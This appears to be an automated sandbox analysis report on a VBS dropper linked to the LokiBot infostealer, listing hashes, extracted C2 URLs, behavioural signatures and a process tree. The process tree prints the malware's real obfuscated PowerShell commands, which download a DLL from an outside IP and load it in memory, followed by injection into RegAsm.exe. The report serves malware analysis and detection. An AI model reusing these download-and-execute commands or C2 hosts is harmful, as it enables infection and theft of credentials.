Analysis
- max time kernel: 148s
- max time network: 156s
- platform: windows10-2004_x64
- resource: win10v2004-20220901-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20220901-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 29-11-2022 12:43

Static task
- static1

Behavioral task
- behavioral1
  - Sample: 65b56626ae18acca0542ed6349fe76ff.vbs
  - Resource: win7-20221111-en

Behavioral task
- behavioral2
  - Sample: 65b56626ae18acca0542ed6349fe76ff.vbs
  - Resource: win10v2004-20220901-en
General
- Target: 65b56626ae18acca0542ed6349fe76ff.vbs
- Size: 159KB
- MD5: 5bc0dbb1d4f2c3ee0aaad47f123f95bb
- SHA1: 5aaf4ad4a1e1a4fa206b0034b5653e09c4715071
- SHA256: 792266a30b07db531fd65d979c4f91a271207eb2f3ffdee26f452ceba9af5349
- SHA512: cd8e2c2b0a4e1631a30dfd6be8dc22da411704da116bbcafe68caaa3efefd6c2062f53e0b39bea81c50e473493868af3f1594cc21f25417bac202bf149e8d0ae
- SSDEEP: 3072:oHGRwfkYFEhNe4VTdRnTT8w4TWXZqvcjk:7wfkYFYZqvcw
Malware Config
Extracted
- http://4.204.233.44/dll/NoStartUp.ppam

Extracted (family: lokibot)
- http://cantebo.buzz/five/fre.php
- http://kbfvzoboss.bid/alien/fre.php
- http://alphastand.trade/alien/fre.php
- http://alphastand.win/alien/fre.php
- http://alphastand.top/alien/fre.php
Signatures
- Blocklisted process makes network request (2 IoCs)
  Processes: powershell.exe
  - flow 3, pid 724, process powershell.exe
  - flow 4, pid 724, process powershell.exe
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
  Processes: WScript.exe
  - Key value queried: \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation (process: WScript.exe)
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Accesses Microsoft Outlook profiles (1 TTP, 3 IoCs)
  Processes: RegAsm.exe
  - Key opened: \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook (process: RegAsm.exe)
  - Key opened: \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook (process: RegAsm.exe)
  - Key opened: \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook (process: RegAsm.exe)
- Suspicious use of SetThreadContext (1 IoC)
  Processes: powershell.exe
  - PID 724 set thread context of 4748 (pid 724, process powershell.exe, target process RegAsm.exe)
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Suspicious behavior: EnumeratesProcesses (4 IoCs)
  Processes: powershell.exe, powershell.exe
  - pid 5024, process powershell.exe
  - pid 5024, process powershell.exe
  - pid 724, process powershell.exe
  - pid 724, process powershell.exe
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes: powershell.exe, powershell.exe, RegAsm.exe
  - Token: SeDebugPrivilege (pid 5024, process powershell.exe)
  - Token: SeDebugPrivilege (pid 724, process powershell.exe)
  - Token: SeDebugPrivilege (pid 4748, process RegAsm.exe)
- Suspicious use of WriteProcessMemory (13 IoCs)
  Processes: WScript.exe, powershell.exe, powershell.exe
  - PID 4948 wrote to memory of 5024 (pid 4948, process WScript.exe, target process powershell.exe)
  - PID 4948 wrote to memory of 5024 (pid 4948, process WScript.exe, target process powershell.exe)
  - PID 5024 wrote to memory of 724 (pid 5024, process powershell.exe, target process powershell.exe)
  - PID 5024 wrote to memory of 724 (pid 5024, process powershell.exe, target process powershell.exe)
  - PID 724 wrote to memory of 4748 (pid 724, process powershell.exe, target process RegAsm.exe)
  - PID 724 wrote to memory of 4748 (pid 724, process powershell.exe, target process RegAsm.exe)
  - PID 724 wrote to memory of 4748 (pid 724, process powershell.exe, target process RegAsm.exe)
  - PID 724 wrote to memory of 4748 (pid 724, process powershell.exe, target process RegAsm.exe)
  - PID 724 wrote to memory of 4748 (pid 724, process powershell.exe, target process RegAsm.exe)
  - PID 724 wrote to memory of 4748 (pid 724, process powershell.exe, target process RegAsm.exe)
  - PID 724 wrote to memory of 4748 (pid 724, process powershell.exe, target process RegAsm.exe)
  - PID 724 wrote to memory of 4748 (pid 724, process powershell.exe, target process RegAsm.exe)
  - PID 724 wrote to memory of 4748 (pid 724, process powershell.exe, target process RegAsm.exe)
- outlook_office_path (1 IoC)
  Processes: RegAsm.exe
  - Key opened: \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook (process: RegAsm.exe)
- outlook_win_path (1 IoC)
  Processes: RegAsm.exe
  - Key opened: \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook (process: RegAsm.exe)
Processes
- [depth 1] C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\65b56626ae18acca0542ed6349fe76ff.vbs"
  Signatures:
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
- [depth 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC❤Hk❤d❤Bl❤Fs❤XQBd❤C❤❤J❤BE❤Ew❤T❤❤g❤D0❤I❤Bb❤FM❤eQBz❤HQ❤ZQBt❤C4❤QwBv❤G4❤dgBl❤HI❤d❤Bd❤Do❤OgBG❤HI❤bwBt❤EI❤YQBz❤GU❤Ng❤0❤FM❤d❤By❤Gk❤bgBn❤Cg❤K❤BO❤GU❤dw❤t❤E8❤YgBq❤GU❤YwB0❤C❤❤TgBl❤HQ❤LgBX❤GU❤YgBD❤Gw❤aQBl❤G4❤d❤❤p❤C4❤R❤Bv❤Hc❤bgBs❤G8❤YQBk❤FM❤d❤By❤Gk❤bgBn❤Cg❤JwBo❤HQ❤d❤Bw❤Do❤Lw❤v❤DQ❤Lg❤y❤D❤❤N❤❤u❤DI❤Mw❤z❤C4❤N❤❤0❤C8❤Z❤Bs❤Gw❤LwBO❤G8❤UwB0❤GE❤cgB0❤FU❤c❤❤u❤H❤❤c❤Bh❤G0❤Jw❤p❤Ck❤OwBb❤FM❤eQBz❤HQ❤ZQBt❤C4❤QQBw❤H❤❤R❤Bv❤G0❤YQBp❤G4❤XQ❤6❤Do❤QwB1❤HI❤cgBl❤G4❤d❤BE❤G8❤bQBh❤Gk❤bg❤u❤Ew❤bwBh❤GQ❤K❤❤k❤EQ❤T❤BM❤Ck❤LgBH❤GU❤d❤BU❤Hk❤c❤Bl❤Cg❤JwBG❤Gk❤YgBl❤HI❤LgBI❤G8❤bQBl❤Cc❤KQ❤u❤Ec❤ZQB0❤E0❤ZQB0❤Gg❤bwBk❤Cg❤JwBW❤EE❤SQ❤n❤Ck❤LgBJ❤G4❤dgBv❤Gs❤ZQ❤o❤CQ❤bgB1❤Gw❤b❤❤s❤C❤❤WwBv❤GI❤agBl❤GM❤d❤Bb❤F0❤XQ❤g❤Cg❤JwB0❤Hg❤d❤❤u❤HM❤awBk❤GI❤ZgBm❤Go❤agBk❤HM❤YgBm❤Ho❤agBz❤HY❤Z❤Bm❤Go❤Z❤Br❤Go❤eg❤v❤DQ❤Mg❤u❤D❤❤Mg❤x❤C4❤O❤❤3❤DE❤Lg❤1❤Dk❤MQ❤v❤C8❤OgBw❤HQ❤d❤Bo❤Cc❤KQ❤p❤❤==';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('❤','A') ) ).replace('%testinmg%','');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
  Signatures:
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
- [depth 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://4.204.233.44/dll/NoStartUp.ppam'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('txt.skdbffjjdsbfzjsvdfjdkjz/42.021.871.591//:ptth'))"
  Signatures:
  - Blocklisted process makes network request
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
- [depth 4] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
  Signatures:
  - Accesses Microsoft Outlook profiles
  - Suspicious use of AdjustPrivilegeToken
  - outlook_office_path
  - outlook_win_path
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  - Filesize: 3KB
  - MD5: f41839a3fe2888c8b3050197bc9a0a05
  - SHA1: 0798941aaf7a53a11ea9ed589752890aee069729
  - SHA256: 224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
  - SHA512: 2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  - Filesize: 64B
  - MD5: 5caad758326454b5788ec35315c4c304
  - SHA1: 3aef8dba8042662a7fcf97e51047dc636b4d4724
  - SHA256: 83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
  - SHA512: 4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693
- memory/724-139-0x00007FFFE81E0000-0x00007FFFE8CA1000-memory.dmp (Filesize: 10.8MB)
- memory/724-134-0x0000000000000000-mapping.dmp
- memory/724-136-0x00007FFFE81E0000-0x00007FFFE8CA1000-memory.dmp (Filesize: 10.8MB)
- memory/4748-138-0x00000000004139DE-mapping.dmp
- memory/4748-137-0x0000000000400000-0x00000000004A2000-memory.dmp (Filesize: 648KB)
- memory/4748-144-0x0000000000400000-0x00000000004A2000-memory.dmp (Filesize: 648KB)
- memory/4748-145-0x0000000000400000-0x00000000004A2000-memory.dmp (Filesize: 648KB)
- memory/4748-146-0x0000000000400000-0x00000000004A2000-memory.dmp (Filesize: 648KB)
- memory/5024-132-0x0000000000000000-mapping.dmp
- memory/5024-135-0x00007FFFE81E0000-0x00007FFFE8CA1000-memory.dmp (Filesize: 10.8MB)
- memory/5024-133-0x000001DF12720000-0x000001DF12742000-memory.dmp (Filesize: 136KB)
- memory/5024-142-0x00007FFFE81E0000-0x00007FFFE8CA1000-memory.dmp (Filesize: 10.8MB)